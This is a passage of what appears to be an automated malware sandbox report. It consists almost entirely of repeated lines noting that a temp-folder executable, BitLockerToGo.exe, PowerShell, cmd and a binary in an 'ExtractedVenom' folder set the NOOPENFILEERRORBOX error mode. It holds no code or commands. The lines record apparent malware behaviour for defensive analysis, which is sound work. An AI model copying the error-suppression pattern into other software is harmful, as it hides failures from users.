                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
